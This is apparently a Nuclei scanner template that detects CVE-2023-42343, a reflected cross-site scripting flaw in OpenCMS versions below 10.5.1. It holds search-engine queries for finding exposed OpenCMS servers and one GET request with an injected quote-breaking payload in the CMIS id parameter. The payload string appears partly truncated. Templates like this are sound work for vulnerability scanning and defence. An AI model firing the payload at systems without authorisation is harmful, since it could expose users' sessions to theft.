id: CVE-2023-42343 info: name: OpenCMS - Cross-Site Scripting author: DhiyaneshDK severity: medium description: | OpenCMS below 10.5.1 is vulnerable to Cross-Site Scripting vulnerability. impact: | Unauthenticated attackers can inject malicious JavaScript through the id parameter in CMIS endpoints to steal user session cookies and execute attacks against OpenCMS users. remediation: Fixed in 10.5.1. reference: - https://labs.watchtowr.com/xxe-you-can-depend-on-me-opencms/ classification: cve-id: CVE-2023-42343 epss-score: 0.0059 epss-percentile: 0.44736 metadata: verified: true max-request: 1 shodan-query: - "/opencms/" - http.title:"opencms" - cpe:"cpe:2.3:a:alkacon:opencms" product: opencms vendor: alkacon fofa-query: title="opencms" google-query: intitle:"opencms" tags: cve,cve2023,xss,opencms,vuln http: - method: GET path: - '{{BaseURL}}/opencms/cmisatom/cmis-online/type?id=1%27">' headers: Content-Type: application/cmisquery+xml matchers-condition: and matchers: - type: word part: body words: - 'Apache Chemistry OpenCMIS' - '' condition: and # digest: 4a0a00473045022100d6ffb33d088c7ca2fa36021a65a193be1846147b844444873c002124fa9ebcd10220644f0bd1c3f79154f731e54a635ef5bbec9e7506e55ba147496f292cd0044644:922c64590222798bb761d5b6d8e72950